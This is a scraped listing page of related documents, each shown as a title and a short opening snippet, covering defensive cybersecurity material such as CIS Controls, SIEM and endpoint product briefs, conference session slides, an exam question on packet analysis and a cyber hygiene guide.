Level One Level Two Level Three Level Four Level Five Level Six 1.1 Utilize an Active Discovery Tool Utilize an active discovery tool to identify devices connected to the organization's network and update
More informationQuestion No: 1 After running a packet analyzer on the network, a security analyst has noticed the following output:
Volume: 75 Questions Question No: 1 After running a packet analyzer on the network, a security analyst has noticed the following output: Which of the following is occurring? A. A ping sweep B. A port scan
More informationSymantec Protection Suite Add-On for Hosted Security
Symantec Protection Suite Add-On for Hosted Email Security Overview Malware and spam pose enormous risk to the health and viability of IT networks. Cyber criminal attacks are focused on stealing money
More informationSIEM Solutions from McAfee
SIEM Solutions from McAfee Monitor. Prioritize. Investigate. Respond. Today s security information and event management (SIEM) solutions need to be able to identify and defend against attacks within an
More informationSOLUTION BRIEF RSA NETWITNESS EVOLVED SIEM
RSA NETWITNESS EVOLVED SIEM OVERVIEW A SIEM is technology originally intended for compliance and log management. Later, as SIEMs became the aggregation points for security alerts, they began to be more
More informationRSA ECAT DETECT, ANALYZE, RESPOND!
RSA ECAT DETECT, ANALYZE, RESPOND! Cyber Threat Landscape Attack surface (& attackers) expanding Web app Existing strategies & controls are failing Laptop EHR Firewall Attacks sophistication on the rise
More informationThe Rise of the Purple Team
SESSION ID: AIR-W02 The Rise of the Purple Team Robert Wood Head of Security Nuna @robertwood50 William Bengtson Senior Security Program Manager Nuna @waggie2009 Typical Team Responsibilities Red Vulnerability
More informationCompare Security Analytics Solutions
Compare Security Analytics Solutions Learn how Cisco Stealthwatch compares with other security analytics products. This solution scales easily, giving you visibility across the entire network. Stealthwatch
More informationCIS Controls Measures and Metrics for Version 7
Level 1.1 Utilize an Active Discovery Tool 1.2 Use a Passive Asset Discovery Tool 1.3 Use DHCP Logging to Update Asset Inventory 1.4 Maintain Detailed Asset Inventory 1.5 Maintain Asset Inventory Information
More informationUn SOC avanzato per una efficace risposta al cybercrime
Un SOC avanzato per una efficace risposta al cybercrime Identificazione e conferma di un incidente @RSAEMEA #RSAEMEASummit @masiste75 Mauro Costantini - Presales Consultant Agenda A look into the threat
More information10x Increase Your Team s Effectiveness by Automating the Boring Stuff
SESSION ID: TTA-R02 10x Increase Your Team s Effectiveness by Automating the Boring Stuff Jonathan Trull Chief Cybersecurity Advisor Microsoft @jonathantrull Vidhi Agarwal Senior Program Manager Microsoft
More informationTHREAT INTEL AND CONTENT CURATION: ORGANIZING THE PATH TO SUCCESSFUL DETECTION
SESSION ID: AIR-W12 THREAT INTEL AND CONTENT CURATION: ORGANIZING THE PATH TO SUCCESSFUL DETECTION Justin Monti CTO MKACyber Mischel Kwon CEO MKACyber @MKACyber What is Cyber Threat Intelligence Data collected,
More informationDefining cybersecurity.
PREPARING FOR TOMORROW S THREATS 28 September 2016 Andrew Facchini Presales & Product Manager +47 459 07 330 andrew@mnemonic.no Defining cybersecurity. WHO IS MNEMONIC? Founded in 2000 110+ security specialists
More informationDATA SHEET RSA NETWITNESS ENDPOINT DETECT UNKNOWN THREATS. REDUCE DWELL TIME. ACCELERATE RESPONSE.
RSA NETWITNESS ENDPOINT DETECT UNKNOWN THREATS. REDUCE DWELL TIME. ACCELERATE RESPONSE. KEY CUSTOMER BENEFITS: Gain complete visibility into all endpoints, regardless of whether they are on or off the
More informationIBM Security Network Protection Solutions
Systems IBM Security IBM Security Network Protection Solutions Pre-emptive protection to keep you Ahead of the Threat Tanmay Shah Product Lead Network Protection Appliances IBM Security Systems 1 IBM Security
More informationFighting Phishing I: Get phish or die tryin.
Fighting Phishing I: Get phish or die tryin. Micah Nelson and Max Hyppolite bit.ly/nercomp_sap918 Please, don t forget to submit your feedback for today s session at the above URL. If you use social media
More information01/02/2014 SECURITY ASSESSMENT METHODOLOGIES SENSEPOST 2014 ALL RIGHTS RESERVED
01/02/2014 SECURITY ASSESSMENT METHODOLOGIES SENSEPOST 2014 ALL RIGHTS RESERVED Contents 1. Introduction 3 2. Security Testing Methodologies 3 2.1 Internet Footprint Assessment 4 2.2 Infrastructure Assessments
More informationFile Reputation Filtering and File Analysis
This chapter contains the following sections: Overview of, page 1 Configuring File Reputation and Analysis Features, page 5 File Reputation and File Analysis Reporting and Tracking, page 14 Taking Action
More informationAdvanced Threat Defense Certification Testing Report. Symantec Corporation Symantec Advanced Threat Protection
Advanced Threat Defense Certification Testing Report Symantec Advanced Threat Protection ICSA Labs Advanced Threat Defense December 8, 2015 Prepared by ICSA Labs 1000 Bent Creek Blvd., Suite 200 Mechanicsburg,
More informationWhat can we lose not implementing proper security in our IT environment? Aleksandar Pavlovic Security Account Manager Cisco
What can we lose not implementing proper security in our IT environment? Aleksandar Pavlovic Security Account Manager Cisco Increasing Digital Traffic Creates a Greater Attack Surface Global IP Traffic
More informationTrend Micro Incorporated reserves the right to make changes to this document and to the product described herein without notice. Before installing and using the product, review the readme files, release
More informationCyber Hygiene Guide. Politicians and Political Parties
Cyber Hygiene Guide Politicians and Political Parties Canadian Election Integrity Initiative Design by ccm.design Cover Image by Songquan Deng Helping to Safeguard the Integrity of the Electoral Process
More informationRSA Advanced Security Operations Richard Nichols, Director EMEA. Copyright 2015 EMC Corporation. All rights reserved. 1
RSA Advanced Security Operations Richard Nichols, Director EMEA 1 What is the problem we need to solve? 2 Attackers Are Outpacing Defenders..and the Gap is Widening Attacker Capabilities The defender-detection
More informationATTIVO NETWORKS THREATDEFEND PLATFORM INTEGRATION WITH CISCO SYSTEMS PROTECTS THE NETWORK
PARTNER BRIEF ATTIVO NETWORKS THREATDEFEND PLATFORM INTEGRATION WITH CISCO SYSTEMS PROTECTS THE NETWORK INTRODUCTION Attivo Networks has partnered with Cisco Systems to provide advanced real-time inside-the-network
More informationManaged Security Services - Endpoint Managed Security on Cloud
Services Description Managed Security Services - Endpoint Managed Security on Cloud The services described herein are governed by the terms and conditions of the agreement specified in the Order Document
More informationFTA 2017 SEATTLE. Cybersecurity and the State Tax Threat Environment. Copyright FireEye, Inc. All rights reserved.
FTA 2017 SEATTLE Cybersecurity and the State Tax Threat Environment 1 Agenda Cybersecurity Trends By the Numbers Attack Trends Defensive Trends State and Local Intelligence What Can You Do? 2 2016: Who
More informationSecurity Monitoring Engineer / (NY or NC) Director, Information Security. New York, NY or Winston-Salem, NC. Location:
Position: Reports to: Location: Security Monitoring Engineer / (NY or NC) Director, Information Security New York, NY or Winston-Salem, NC Position Summary: The Clearing House (TCH) Information Security
More informationTrend Micro Business Support Portal
Lorem Ipsum Dolor Sit Amet Consectetur Adipiscing Trend Micro Business Support Portal User Guide Welcome to the Trend Micro Business Support Portal. This portal provides full online support for Trend Micro
More informationYou Can t Stop What You Can t See
SESSION ID: EXP-RO4 You Can t Stop What You Can t See Learning from the experiences of others Jared Myers Principal Consultant RSA Incident Response RSA, The Security Division of EMC Grant Geyer Senior
More informationWHAT IS CORPORATE ACCOUNT TAKEOVER? HOW DOES IT HAPPEN?
WHAT IS CORPORATE ACCOUNT TAKEOVER? Corporate Account Takeover (also referred to as CATO) is a type of fraud where criminals gain access to a business financial accounts to make unauthorized transactions.
More information